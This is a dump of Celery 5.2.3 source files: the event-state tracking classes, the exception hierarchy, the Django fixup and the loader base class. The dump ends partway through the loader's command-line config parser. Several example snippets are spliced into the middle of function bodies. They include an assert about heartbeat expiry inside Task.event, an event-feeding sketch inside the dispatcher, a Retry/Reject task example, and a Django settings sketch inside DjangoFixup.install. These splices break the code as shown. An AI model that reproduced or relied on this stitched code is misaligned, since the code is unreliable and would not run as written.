'OFFLINE' @property def heartbeat_expires(self): return heartbeat_expires(self.heartbeats[-1], self.freq, self.expire_window) @property def alive(self, nowfun=time): return bool(self.heartbeats and nowfun() < self.heartbeat_expires) @property def id(self): return '{0.hostname}.{0.pid}'.format(self) @with_unique_field('uuid') class Task: """Task State.""" name = received = sent = started = succeeded = failed = retried = \ revoked = rejected = args = kwargs = eta = expires = retries = \ worker = result = exception = timestamp = runtime = traceback = \ exchange = routing_key = root_id = parent_id = client = None state = states.PENDING clock = 0 _fields = ( 'uuid', 'name', 'state', 'received', 'sent', 'started', 'rejected', 'succeeded', 'failed', 'retried', 'revoked', 'args', 'kwargs', 'eta', 'expires', 'retries', 'worker', 'result', 'exception', 'timestamp', 'runtime', 'traceback', 'exchange', 'routing_key', 'clock', 'client', 'root', 'root_id', 'parent', 'parent_id', 'children', ) if not PYPY: # pragma: no cover __slots__ = ('__dict__', '__weakref__') #: How to merge out of order events. #: Disorder is detected by logical ordering (e.g., :event:`task-received` #: must've happened before a :event:`task-failed` event). #: #: A merge rule consists of a state and a list of fields to keep from #: that state. ``(RECEIVED, ('name', 'args')``, means the name and args #: fields are always taken from the RECEIVED state, and any values for #: these fields received before or after is simply ignored. merge_rules = { states.RECEIVED: ( 'name', 'args', 'kwargs', 'parent_id', 'root_id', 'retries', 'eta', 'expires', ), } #: meth:`info` displays these fields by default. _info_fields = ( 'args', 'kwargs', 'retries', 'result', 'eta', 'runtime', 'expires', 'exception', 'exchange', 'routing_key', 'root_id', 'parent_id', ) def __init__(self, uuid=None, cluster_state=None, children=None, **kwargs): self.uuid = uuid self.cluster_state = cluster_state if self.cluster_state is not None: self.children = WeakSet( self.cluster_state.tasks.get(task_id) for task_id in children or () if task_id in self.cluster_state.tasks ) else: self.children = WeakSet() self._serializer_handlers = { 'children': self._serializable_children, 'root': self._serializable_root, 'parent': self._serializable_parent, } if kwargs: self.__dict__.update(kwargs) def event(self, type_, timestamp=None, local_received=None, fields=None, precedence=states.precedence, setattr=setattr, task_event_to_state=TASK_EVENT_TO_STATE.get, RETRY=states.RETRY): fields = fields or {} # using .get is faster than catching KeyError in this case. state = task_event_to_state(type_) if state is not None: # sets, for example, self.succeeded to the timestamp. setattr(self, type_, timestamp) else: state = type_.upper() # custom state # note that precedence here is reversed # see implementation in celery.states.state.__lt__ if state != RETRY and self.state != RETRY and \ precedence(state) > precedence(self.state): # this state logically happens-before the current state, so merge. keep = self.merge_rules.get(state) if keep is not None: fields = { k: v for k, v in fields.items() if k in keep } else: fields.update(state=state, timestamp=timestamp) # update current state with info from this event. 
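# Worked example: with the defaults above (freq=60, HEARTBEAT_EXPIRE_WINDOW=200
# percent), a heartbeat received at time t expires at t + 60 * (200 / 100),
# i.e. a worker is considered offline after two missed heartbeat intervals.
from celery.events.state import heartbeat_expires

assert heartbeat_expires(1000.0, freq=60) == 1120.0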
self.__dict__.update(fields) def info(self, fields=None, extra=None): """Information about this task suitable for on-screen display.""" extra = [] if not extra else extra fields = self._info_fields if fields is None else fields def _keys(): for key in list(fields) + list(extra): value = getattr(self, key, None) if value is not None: yield key, value return dict(_keys()) def __repr__(self): return R_TASK.format(self) def as_dict(self): get = object.__getattribute__ handler = self._serializer_handlers.get return { k: handler(k, pass1)(get(self, k)) for k in self._fields } def _serializable_children(self, value): return [task.id for task in self.children] def _serializable_root(self, value): return self.root_id def _serializable_parent(self, value): return self.parent_id def __reduce__(self): return _depickle_task, (self.__class__, self.as_dict()) @property def id(self): return self.uuid @property def origin(self): return self.client if self.worker is None else self.worker.id @property def ready(self): return self.state in states.READY_STATES @cached_property def parent(self): # issue github.com/mher/flower/issues/648 try: return self.parent_id and self.cluster_state.tasks.data[self.parent_id] except KeyError: return None @cached_property def root(self): # issue github.com/mher/flower/issues/648 try: return self.root_id and self.cluster_state.tasks.data[self.root_id] except KeyError: return None class State: """Records clusters state.""" Worker = Worker Task = Task event_count = 0 task_count = 0 heap_multiplier = 4 def __init__(self, callback=None, workers=None, tasks=None, taskheap=None, max_workers_in_memory=5000, max_tasks_in_memory=10000, on_node_join=None, on_node_leave=None, tasks_by_type=None, tasks_by_worker=None): self.event_callback = callback self.workers = (LRUCache(max_workers_in_memory) if workers is None else workers) self.tasks = (LRUCache(max_tasks_in_memory) if tasks is None else tasks) self._taskheap = [] if taskheap is None else taskheap self.max_workers_in_memory = max_workers_in_memory self.max_tasks_in_memory = max_tasks_in_memory self.on_node_join = on_node_join self.on_node_leave = on_node_leave self._mutex = threading.Lock() self.handlers = {} self._seen_types = set() self._tasks_to_resolve = {} self.rebuild_taskheap() self.tasks_by_type = CallableDefaultdict( self._tasks_by_type, WeakSet) # type: Mapping[str, WeakSet[Task]] self.tasks_by_type.update( _deserialize_Task_WeakSet_Mapping(tasks_by_type, self.tasks)) self.tasks_by_worker = CallableDefaultdict( self._tasks_by_worker, WeakSet) # type: Mapping[str, WeakSet[Task]] self.tasks_by_worker.update( _deserialize_Task_WeakSet_Mapping(tasks_by_worker, self.tasks)) @cached_property def _event(self): return self._create_dispatcher() def freeze_while(self, fun, *args, **kwargs): clear_after = kwargs.pop('clear_after', False) with self._mutex: try: return fun(*args, **kwargs) finally: if clear_after: self._clear() def clear_tasks(self, ready=True): with self._mutex: return self._clear_tasks(ready) def _clear_tasks(self, ready=True): if ready: in_progress = { uuid: task for uuid, task in self.itertasks() if task.state not in states.READY_STATES } self.tasks.clear() self.tasks.update(in_progress) else: self.tasks.clear() self._taskheap[:] = [] def _clear(self, ready=True): self.workers.clear() self._clear_tasks(ready) self.event_count = 0 self.task_count = 0 def clear(self, ready=True): with self._mutex: return self._clear(ready) def get_or_create_worker(self, hostname, **kwargs): """Get or create worker by hostname. 
Returns: Tuple: of ``(worker, was_created)`` pairs. """ try: worker = self.workers[hostname] if kwargs: worker.update(kwargs) return worker, False except KeyError: worker = self.workers[hostname] = self.Worker( hostname, **kwargs) return worker, True def get_or_create_task(self, uuid): """Get or create task by uuid.""" try: return self.tasks[uuid], False except KeyError: task = self.tasks[uuid] = self.Task(uuid, cluster_state=self) return task, True def event(self, event): with self._mutex: return self._event(event) def task_event(self, type_, fields): """Deprecated, use :meth:`event`.""" return self._event(dict(fields, type='-'.join(['task', type_])))[0] def worker_event(self, type_, fields): """Deprecated, use :meth:`event`.""" return self._event(dict(fields, type='-'.join(['worker', type_])))[0] def _create_dispatcher(self): # pylint: disable=too-many-statements # This code is highly optimized, but not for reusability. get_handler = self.handlers.__getitem__ event_callback = self.event_callback wfields = itemgetter('hostname', 'timestamp', 'local_received') tfields = itemgetter('uuid', 'hostname', 'timestamp', 'local_received', 'clock') taskheap = self._taskheap th_append = taskheap.append th_pop = taskheap.pop # Removing events from task heap is an O(n) operation, # so easier to just account for the common number of events # for each task (PENDING->RECEIVED->STARTED->final) #: an O(n) operation max_events_in_heap = self.max_tasks_in_memory * self.heap_multiplier add_type = self._seen_types.add on_node_join, on_node_leave = self.on_node_join, self.on_node_leave tasks, Task = self.tasks, self.Task workers, Worker = self.workers, self.Worker # avoid updating LRU entry at getitem get_worker, get_task = workers.data.__getitem__, tasks.data.__getitem__ get_task_by_type_set = self.tasks_by_type.__getitem__ get_task_by_worker_set = self.tasks_by_worker.__getitem__ def _event(event, timetuple=timetuple, KeyError=KeyError, insort=bisect.insort, created=True): self.event_count += 1 if event_callback: event_callback(self, event) group, _, subject = event['type'].partition('-') try: handler = get_handler(group) except KeyError: pass else: return handler(subject, event), subject if group == 'worker': try: hostname, timestamp, local_received = wfields(event) except KeyError: pass else: is_offline = subject == 'offline' try: worker, created = get_worker(hostname), False except KeyError: if is_offline: worker, created = Worker(hostname), False else: worker = workers[hostname] = Worker(hostname) worker.event(subject, timestamp, local_received, event) if on_node_join and (created or subject == 'online'): on_node_join(worker) if on_node_leave and is_offline: on_node_leave(worker) workers.pop(hostname, None) return (worker, created), subject elif group == 'task': (uuid, hostname, timestamp, local_received, clock) = tfields(event) # task-sent event is sent by client, not worker is_client_event = subject == 'sent' try: task, task_created = get_task(uuid), False except KeyError: task = tasks[uuid] = Task(uuid, cluster_state=self) task_created = True if is_client_event: task.client = hostname else: try: worker = get_worker(hostname) except KeyError: worker = workers[hostname] = Worker(hostname) task.worker = worker if worker is not None and local_received: worker.event(None, local_received, timestamp) origin = hostname if is_client_event else worker.id # remove oldest event if exceeding the limit. 
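# Example (a sketch with made-up field values): feeding synthetic events
# through State.event() by hand; the field names match the wfields/tfields
# itemgetters used by the dispatcher above.
from time import time

from celery import uuid
from celery.events.event import Event
from celery.events.state import State

state = State()
state.event(Event('worker-online', hostname='worker1@example.com',
                  local_received=time(), clock=1))
state.event(Event('task-received', uuid=uuid(), name='proj.tasks.add',
                  args='(2, 2)', kwargs='{}', retries=0,
                  hostname='worker1@example.com',
                  local_received=time(), clock=2))
print(state.task_count, sorted(state.workers))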
heaps = len(taskheap) if heaps + 1 > max_events_in_heap: th_pop(0) # most events will be dated later than the previous. timetup = timetuple(clock, timestamp, origin, ref(task)) if heaps and timetup > taskheap[-1]: th_append(timetup) else: insort(taskheap, timetup) if subject == 'received': self.task_count += 1 task.event(subject, timestamp, local_received, event) task_name = task.name if task_name is not None: add_type(task_name) if task_created: # add to tasks_by_type index get_task_by_type_set(task_name).add(task) get_task_by_worker_set(hostname).add(task) if task.parent_id: try: parent_task = self.tasks[task.parent_id] except KeyError: self._add_pending_task_child(task) else: parent_task.children.add(task) try: _children = self._tasks_to_resolve.pop(uuid) except KeyError: pass else: task.children.update(_children) return (task, task_created), subject return _event def _add_pending_task_child(self, task): try: ch = self._tasks_to_resolve[task.parent_id] except KeyError: ch = self._tasks_to_resolve[task.parent_id] = WeakSet() ch.add(task) def rebuild_taskheap(self, timetuple=timetuple): heap = self._taskheap[:] = [ timetuple(t.clock, t.timestamp, t.origin, ref(t)) for t in self.tasks.values() ] heap.sort() def itertasks(self, limit=None): for index, row in enumerate(self.tasks.items()): yield row if limit and index + 1 >= limit: break def tasks_by_time(self, limit=None, reverse=True): """Generator yielding tasks ordered by time. Yields: Tuples of ``(uuid, Task)``. """ _heap = self._taskheap if reverse: _heap = reversed(_heap) seen = set() for evtup in islice(_heap, 0, limit): task = evtup[3]() if task is not None: uuid = task.uuid if uuid not in seen: yield uuid, task seen.add(uuid) tasks_by_timestamp = tasks_by_time def _tasks_by_type(self, name, limit=None, reverse=True): """Get all tasks by type. This is slower than accessing :attr:`tasks_by_type`, but will be ordered by time. Returns: Generator: giving ``(uuid, Task)`` pairs. """ return islice( ((uuid, task) for uuid, task in self.tasks_by_time(reverse=reverse) if task.name == name), 0, limit, ) def _tasks_by_worker(self, hostname, limit=None, reverse=True): """Get all tasks by worker. Slower than accessing :attr:`tasks_by_worker`, but ordered by time. """ return islice( ((uuid, task) for uuid, task in self.tasks_by_time(reverse=reverse) if task.worker.hostname == hostname), 0, limit, ) def task_types(self): """Return a list of all seen task types.""" return sorted(self._seen_types) def alive_workers(self): """Return a list of (seemingly) alive workers.""" return (w for w in self.workers.values() if w.alive) def __repr__(self): return R_STATE.format(self) def __reduce__(self): return self.__class__, ( self.event_callback, self.workers, self.tasks, None, self.max_workers_in_memory, self.max_tasks_in_memory, self.on_node_join, self.on_node_leave, _serialize_Task_WeakSet_Mapping(self.tasks_by_type), _serialize_Task_WeakSet_Mapping(self.tasks_by_worker), ) def _serialize_Task_WeakSet_Mapping(mapping): return {name: [t.id for t in tasks] for name, tasks in mapping.items()} def _deserialize_Task_WeakSet_Mapping(mapping, tasks): mapping = mapping or {} return {name: WeakSet(tasks[i] for i in ids if i in tasks) for name, ids in mapping.items()} ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/exceptions.py0000664000175000017500000002150600000000000016717 0ustar00asifasif00000000000000"""Celery error types. 
Error Hierarchy =============== - :exc:`Exception` - :exc:`celery.exceptions.CeleryError` - :exc:`~celery.exceptions.ImproperlyConfigured` - :exc:`~celery.exceptions.SecurityError` - :exc:`~celery.exceptions.TaskPredicate` - :exc:`~celery.exceptions.Ignore` - :exc:`~celery.exceptions.Reject` - :exc:`~celery.exceptions.Retry` - :exc:`~celery.exceptions.TaskError` - :exc:`~celery.exceptions.QueueNotFound` - :exc:`~celery.exceptions.IncompleteStream` - :exc:`~celery.exceptions.NotRegistered` - :exc:`~celery.exceptions.AlreadyRegistered` - :exc:`~celery.exceptions.TimeoutError` - :exc:`~celery.exceptions.MaxRetriesExceededError` - :exc:`~celery.exceptions.TaskRevokedError` - :exc:`~celery.exceptions.InvalidTaskError` - :exc:`~celery.exceptions.ChordError` - :exc:`~celery.exceptions.BackendError` - :exc:`~celery.exceptions.BackendGetMetaError` - :exc:`~celery.exceptions.BackendStoreError` - :class:`kombu.exceptions.KombuError` - :exc:`~celery.exceptions.OperationalError` Raised when a transport connection error occurs while sending a message (be it a task, remote control command error). .. note:: This exception does not inherit from :exc:`~celery.exceptions.CeleryError`. - **billiard errors** (prefork pool) - :exc:`~celery.exceptions.SoftTimeLimitExceeded` - :exc:`~celery.exceptions.TimeLimitExceeded` - :exc:`~celery.exceptions.WorkerLostError` - :exc:`~celery.exceptions.Terminated` - :class:`UserWarning` - :class:`~celery.exceptions.CeleryWarning` - :class:`~celery.exceptions.AlwaysEagerIgnored` - :class:`~celery.exceptions.DuplicateNodenameWarning` - :class:`~celery.exceptions.FixupWarning` - :class:`~celery.exceptions.NotConfigured` - :class:`~celery.exceptions.SecurityWarning` - :exc:`BaseException` - :exc:`SystemExit` - :exc:`~celery.exceptions.WorkerTerminate` - :exc:`~celery.exceptions.WorkerShutdown` """ import numbers from billiard.exceptions import (SoftTimeLimitExceeded, Terminated, TimeLimitExceeded, WorkerLostError) from click import ClickException from kombu.exceptions import OperationalError __all__ = ( 'reraise', # Warnings 'CeleryWarning', 'AlwaysEagerIgnored', 'DuplicateNodenameWarning', 'FixupWarning', 'NotConfigured', 'SecurityWarning', # Core errors 'CeleryError', 'ImproperlyConfigured', 'SecurityError', # Kombu (messaging) errors. 'OperationalError', # Task semi-predicates 'TaskPredicate', 'Ignore', 'Reject', 'Retry', # Task related errors. 'TaskError', 'QueueNotFound', 'IncompleteStream', 'NotRegistered', 'AlreadyRegistered', 'TimeoutError', 'MaxRetriesExceededError', 'TaskRevokedError', 'InvalidTaskError', 'ChordError', # Backend related errors. 'BackendError', 'BackendGetMetaError', 'BackendStoreError', # Billiard task errors. 'SoftTimeLimitExceeded', 'TimeLimitExceeded', 'WorkerLostError', 'Terminated', # Deprecation warnings (forcing Python to emit them). 'CPendingDeprecationWarning', 'CDeprecationWarning', # Worker shutdown semi-predicates (inherits from SystemExit). 
'WorkerShutdown', 'WorkerTerminate', 'CeleryCommandException', ) UNREGISTERED_FMT = """\ Task of kind {0} never registered, please make sure it's imported.\ """ def reraise(tp, value, tb=None): """Reraise exception.""" if value.__traceback__ is not tb: raise value.with_traceback(tb) raise value class CeleryWarning(UserWarning): """Base class for all Celery warnings.""" class AlwaysEagerIgnored(CeleryWarning): """send_task ignores :setting:`task_always_eager` option.""" class DuplicateNodenameWarning(CeleryWarning): """Multiple workers are using the same nodename.""" class FixupWarning(CeleryWarning): """Fixup related warning.""" class NotConfigured(CeleryWarning): """Celery hasn't been configured, as no config module has been found.""" class SecurityWarning(CeleryWarning): """Potential security issue found.""" class CeleryError(Exception): """Base class for all Celery errors.""" class TaskPredicate(CeleryError): """Base class for task-related semi-predicates.""" class Retry(TaskPredicate): """The task is to be retried later.""" #: Optional message describing context of retry. message = None #: Exception (if any) that caused the retry to happen. exc = None #: Time of retry (ETA), either :class:`numbers.Real` or #: :class:`~datetime.datetime`. when = None def __init__(self, message=None, exc=None, when=None, is_eager=False, sig=None, **kwargs): from kombu.utils.encoding import safe_repr self.message = message if isinstance(exc, str): self.exc, self.excs = None, exc else: self.exc, self.excs = exc, safe_repr(exc) if exc else None self.when = when self.is_eager = is_eager self.sig = sig super().__init__(self, exc, when, **kwargs) def humanize(self): if isinstance(self.when, numbers.Number): return f'in {self.when}s' return f'at {self.when}' def __str__(self): if self.message: return self.message if self.excs: return f'Retry {self.humanize()}: {self.excs}' return f'Retry {self.humanize()}' def __reduce__(self): return self.__class__, (self.message, self.exc, self.when) RetryTaskError = Retry # XXX compat class Ignore(TaskPredicate): """A task can raise this to ignore doing state updates.""" class Reject(TaskPredicate): """A task can raise this if it wants to reject/re-queue the message.""" def __init__(self, reason=None, requeue=False): self.reason = reason self.requeue = requeue super().__init__(reason, requeue) def __repr__(self): return f'reject requeue={self.requeue}: {self.reason}' class ImproperlyConfigured(CeleryError): """Celery is somehow improperly configured.""" class SecurityError(CeleryError): """Security related exception.""" class TaskError(CeleryError): """Task related errors.""" class QueueNotFound(KeyError, TaskError): """Task routed to a queue not in ``conf.queues``.""" class IncompleteStream(TaskError): """Found the end of a stream of data, but the data isn't complete.""" class NotRegistered(KeyError, TaskError): """The task is not registered.""" def __repr__(self): return UNREGISTERED_FMT.format(self) class AlreadyRegistered(TaskError): """The task is already registered.""" # XXX Unused class TimeoutError(TaskError): """The operation timed out.""" class MaxRetriesExceededError(TaskError): """The tasks max restart limit has been exceeded.""" def __init__(self, *args, **kwargs): self.task_args = kwargs.pop("task_args", []) self.task_kwargs = kwargs.pop("task_kwargs", dict()) super().__init__(*args, **kwargs) class TaskRevokedError(TaskError): """The task has been revoked, so no result available.""" class InvalidTaskError(TaskError): """The task has invalid data or ain't 
properly constructed.""" class ChordError(TaskError): """A task part of the chord raised an exception.""" class CPendingDeprecationWarning(PendingDeprecationWarning): """Warning of pending deprecation.""" class CDeprecationWarning(DeprecationWarning): """Warning of deprecation.""" class WorkerTerminate(SystemExit): """Signals that the worker should terminate immediately.""" SystemTerminate = WorkerTerminate # XXX compat class WorkerShutdown(SystemExit): """Signals that the worker should perform a warm shutdown.""" class BackendError(Exception): """An issue writing or reading to/from the backend.""" class BackendGetMetaError(BackendError): """An issue reading from the backend.""" def __init__(self, *args, **kwargs): self.task_id = kwargs.get('task_id', "") def __repr__(self): return super().__repr__() + " task_id:" + self.task_id class BackendStoreError(BackendError): """An issue writing to the backend.""" def __init__(self, *args, **kwargs): self.state = kwargs.get('state', "") self.task_id = kwargs.get('task_id', "") def __repr__(self): return super().__repr__() + " state:" + self.state + " task_id:" + self.task_id class CeleryCommandException(ClickException): """A general command exception which stores an exit code.""" def __init__(self, message, exit_code): super().__init__(message=message) self.exit_code = exit_code ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4597507 celery-5.2.3/celery/fixups/0000775000175000017500000000000000000000000015476 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/fixups/__init__.py0000664000175000017500000000001600000000000017604 0ustar00asifasif00000000000000"""Fixups.""" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/fixups/django.py0000664000175000017500000001467400000000000017326 0ustar00asifasif00000000000000"""Django-specific customization.""" import os import sys import warnings from datetime import datetime from importlib import import_module from kombu.utils.imports import symbol_by_name from kombu.utils.objects import cached_property from celery import _state, signals from celery.exceptions import FixupWarning, ImproperlyConfigured __all__ = ('DjangoFixup', 'fixup') ERR_NOT_INSTALLED = """\ Environment variable DJANGO_SETTINGS_MODULE is defined but Django isn't installed. Won't apply Django fix-ups! """ def _maybe_close_fd(fh): try: os.close(fh.fileno()) except (AttributeError, OSError, TypeError): # TypeError added for celery#962 pass def _verify_django_version(django): if django.VERSION < (1, 11): raise ImproperlyConfigured('Celery 5.x requires Django 1.11 or later.') def fixup(app, env='DJANGO_SETTINGS_MODULE'): """Install Django fixup if settings module environment is set.""" SETTINGS_MODULE = os.environ.get(env) if SETTINGS_MODULE and 'django' not in app.loader_cls.lower(): try: import django except ImportError: warnings.warn(FixupWarning(ERR_NOT_INSTALLED)) else: _verify_django_version(django) return DjangoFixup(app).install() class DjangoFixup: """Fixup installed when using Django.""" def __init__(self, app): self.app = app if _state.default_app is None: self.app.set_default() self._worker_fixup = None def install(self): # Need to add project directory to path. # The project directory has precedence over system modules, # so we prepend it to the path. 
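# Example (a sketch under assumed names): using the Retry and Reject
# semi-predicates defined above inside a task.  The app, the broker URL,
# TemporaryError and handle() are placeholders.
from celery import Celery
from celery.exceptions import Reject

app = Celery('myapp', broker='amqp://')             # assumed broker URL

class TemporaryError(Exception):
    """Hypothetical transient failure."""

def handle(payload):
    """Hypothetical business logic that may raise TemporaryError."""
    return payload

@app.task(bind=True, acks_late=True, max_retries=3)
def process(self, payload):
    try:
        return handle(payload)
    except TemporaryError as exc:
        raise self.retry(exc=exc, countdown=10)     # raises Retry internally
    except ValueError as exc:
        raise Reject(str(exc), requeue=False)       # discard the message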
sys.path.insert(0, os.getcwd()) self._settings = symbol_by_name('django.conf:settings') self.app.loader.now = self.now signals.import_modules.connect(self.on_import_modules) signals.worker_init.connect(self.on_worker_init) return self @property def worker_fixup(self): if self._worker_fixup is None: self._worker_fixup = DjangoWorkerFixup(self.app) return self._worker_fixup @worker_fixup.setter def worker_fixup(self, value): self._worker_fixup = value def on_import_modules(self, **kwargs): # call django.setup() before task modules are imported self.worker_fixup.validate_models() def on_worker_init(self, **kwargs): self.worker_fixup.install() def now(self, utc=False): return datetime.utcnow() if utc else self._now() def autodiscover_tasks(self): from django.apps import apps return [config.name for config in apps.get_app_configs()] @cached_property def _now(self): return symbol_by_name('django.utils.timezone:now') class DjangoWorkerFixup: _db_recycles = 0 def __init__(self, app): self.app = app self.db_reuse_max = self.app.conf.get('CELERY_DB_REUSE_MAX', None) self._db = import_module('django.db') self._cache = import_module('django.core.cache') self._settings = symbol_by_name('django.conf:settings') self.interface_errors = ( symbol_by_name('django.db.utils.InterfaceError'), ) self.DatabaseError = symbol_by_name('django.db:DatabaseError') def django_setup(self): import django django.setup() def validate_models(self): from django.core.checks import run_checks self.django_setup() run_checks() def install(self): signals.beat_embedded_init.connect(self.close_database) signals.worker_ready.connect(self.on_worker_ready) signals.task_prerun.connect(self.on_task_prerun) signals.task_postrun.connect(self.on_task_postrun) signals.worker_process_init.connect(self.on_worker_process_init) self.close_database() self.close_cache() return self def on_worker_process_init(self, **kwargs): # Child process must validate models again if on Windows, # or if they were started using execv. if os.environ.get('FORKED_BY_MULTIPROCESSING'): self.validate_models() # close connections: # the parent process may have established these, # so need to close them. # calling db.close() on some DB connections will cause # the inherited DB conn to also get broken in the parent # process so we need to remove it without triggering any # network IO that close() might cause. 
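# Example (the conventional layout): the fixup above only activates when
# DJANGO_SETTINGS_MODULE is set before the app is created, typically in the
# project's celery.py.  'proj' is a placeholder project name.
import os

from celery import Celery

os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'proj.settings')

app = Celery('proj')
app.config_from_object('django.conf:settings', namespace='CELERY')
app.autodiscover_tasks()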
for c in self._db.connections.all(): if c and c.connection: self._maybe_close_db_fd(c.connection) # use the _ version to avoid DB_REUSE preventing the conn.close() call self._close_database(force=True) self.close_cache() def _maybe_close_db_fd(self, fd): try: _maybe_close_fd(fd) except self.interface_errors: pass def on_task_prerun(self, sender, **kwargs): """Called before every task.""" if not getattr(sender.request, 'is_eager', False): self.close_database() def on_task_postrun(self, sender, **kwargs): # See https://groups.google.com/group/django-users/ # browse_thread/thread/78200863d0c07c6d/ if not getattr(sender.request, 'is_eager', False): self.close_database() self.close_cache() def close_database(self, **kwargs): if not self.db_reuse_max: return self._close_database() if self._db_recycles >= self.db_reuse_max * 2: self._db_recycles = 0 self._close_database() self._db_recycles += 1 def _close_database(self, force=False): for conn in self._db.connections.all(): try: if force: conn.close() else: conn.close_if_unusable_or_obsolete() except self.interface_errors: pass except self.DatabaseError as exc: str_exc = str(exc) if 'closed' not in str_exc and 'not connected' not in str_exc: raise def close_cache(self): try: self._cache.close_caches() except (TypeError, AttributeError): pass def on_worker_ready(self, **kwargs): if self._settings.DEBUG: warnings.warn('''Using settings.DEBUG leads to a memory leak, never use this setting in production environments!''') ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4637508 celery-5.2.3/celery/loaders/0000775000175000017500000000000000000000000015611 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/loaders/__init__.py0000664000175000017500000000075200000000000017726 0ustar00asifasif00000000000000"""Get loader by name. Loaders define how configuration is read, what happens when workers start, when tasks are executed and so on. 
""" from celery.utils.imports import import_from_cwd, symbol_by_name __all__ = ('get_loader_cls',) LOADER_ALIASES = { 'app': 'celery.loaders.app:AppLoader', 'default': 'celery.loaders.default:Loader', } def get_loader_cls(loader): """Get loader class by name/alias.""" return symbol_by_name(loader, LOADER_ALIASES, imp=import_from_cwd) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/loaders/app.py0000664000175000017500000000030700000000000016743 0ustar00asifasif00000000000000"""The default loader used with custom app instances.""" from .base import BaseLoader __all__ = ('AppLoader',) class AppLoader(BaseLoader): """Default loader used when an app is specified.""" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/loaders/base.py0000664000175000017500000002123500000000000017100 0ustar00asifasif00000000000000"""Loader base class.""" import importlib import os import re import sys from datetime import datetime from kombu.utils import json from kombu.utils.objects import cached_property from celery import signals from celery.exceptions import reraise from celery.utils.collections import DictAttribute, force_mapping from celery.utils.functional import maybe_list from celery.utils.imports import (NotAPackage, find_module, import_from_cwd, symbol_by_name) __all__ = ('BaseLoader',) _RACE_PROTECTION = False CONFIG_INVALID_NAME = """\ Error: Module '{module}' doesn't exist, or it's not a valid \ Python module name. """ CONFIG_WITH_SUFFIX = CONFIG_INVALID_NAME + """\ Did you mean '{suggest}'? """ unconfigured = object() class BaseLoader: """Base class for loaders. Loaders handles, * Reading celery client/worker configurations. * What happens when a task starts? See :meth:`on_task_init`. * What happens when the worker starts? See :meth:`on_worker_init`. * What happens when the worker shuts down? See :meth:`on_worker_shutdown`. * What modules are imported to find tasks? """ builtin_modules = frozenset() configured = False override_backends = {} worker_initialized = False _conf = unconfigured def __init__(self, app, **kwargs): self.app = app self.task_modules = set() def now(self, utc=True): if utc: return datetime.utcnow() return datetime.now() def on_task_init(self, task_id, task): """Called before a task is executed.""" def on_process_cleanup(self): """Called after a task is executed.""" def on_worker_init(self): """Called when the worker (:program:`celery worker`) starts.""" def on_worker_shutdown(self): """Called when the worker (:program:`celery worker`) shuts down.""" def on_worker_process_init(self): """Called when a child process starts.""" def import_task_module(self, module): self.task_modules.add(module) return self.import_from_cwd(module) def import_module(self, module, package=None): return importlib.import_module(module, package=package) def import_from_cwd(self, module, imp=None, package=None): return import_from_cwd( module, self.import_module if imp is None else imp, package=package, ) def import_default_modules(self): responses = signals.import_modules.send(sender=self.app) # Prior to this point loggers are not yet set up properly, need to # check responses manually and reraised exceptions if any, otherwise # they'll be silenced, making it incredibly difficult to debug. 
for _, response in responses: if isinstance(response, Exception): raise response return [self.import_task_module(m) for m in self.default_modules] def init_worker(self): if not self.worker_initialized: self.worker_initialized = True self.import_default_modules() self.on_worker_init() def shutdown_worker(self): self.on_worker_shutdown() def init_worker_process(self): self.on_worker_process_init() def config_from_object(self, obj, silent=False): if isinstance(obj, str): try: obj = self._smart_import(obj, imp=self.import_from_cwd) except (ImportError, AttributeError): if silent: return False raise self._conf = force_mapping(obj) if self._conf.get('override_backends') is not None: self.override_backends = self._conf['override_backends'] return True def _smart_import(self, path, imp=None): imp = self.import_module if imp is None else imp if ':' in path: # Path includes attribute so can just jump # here (e.g., ``os.path:abspath``). return symbol_by_name(path, imp=imp) # Not sure if path is just a module name or if it includes an # attribute name (e.g., ``os.path``, vs, ``os.path.abspath``). try: return imp(path) except ImportError: # Not a module name, so try module + attribute. return symbol_by_name(path, imp=imp) def _import_config_module(self, name): try: self.find_module(name) except NotAPackage as exc: if name.endswith('.py'): reraise(NotAPackage, NotAPackage(CONFIG_WITH_SUFFIX.format( module=name, suggest=name[:-3])), sys.exc_info()[2]) raise NotAPackage(CONFIG_INVALID_NAME.format(module=name)) from exc else: return self.import_from_cwd(name) def find_module(self, module): return find_module(module) def cmdline_config_parser(self, args, namespace='celery', re_type=re.compile(r'\((\w+)\)'), extra_types=None, override_types=None): extra_types = extra_types if extra_types else {'json': json.loads} override_types = override_types if override_types else { 'tuple': 'json', 'list': 'json', 'dict': 'json' } from celery.app.defaults import NAMESPACES, Option namespace = namespace and namespace.lower() typemap = dict(Option.typemap, **extra_types) def getarg(arg): """Parse single configuration from command-line.""" # ## find key/value # ns.key=value|ns_key=value (case insensitive) key, value = arg.split('=', 1) key = key.lower().replace('.', '_') # ## find name-space. # .key=value|_key=value expands to default name-space. if key[0] == '_': ns, key = namespace, key[1:] else: # find name-space part of key ns, key = key.split('_', 1) ns_key = (ns and ns + '_' or '') + key # (type)value makes cast to custom type. cast = re_type.match(value) if cast: type_ = cast.groups()[0] type_ = override_types.get(type_, type_) value = value[len(cast.group()):] value = typemap[type_](value) else: try: value = NAMESPACES[ns.lower()][key].to_python(value) except ValueError as exc: # display key name in error message. 
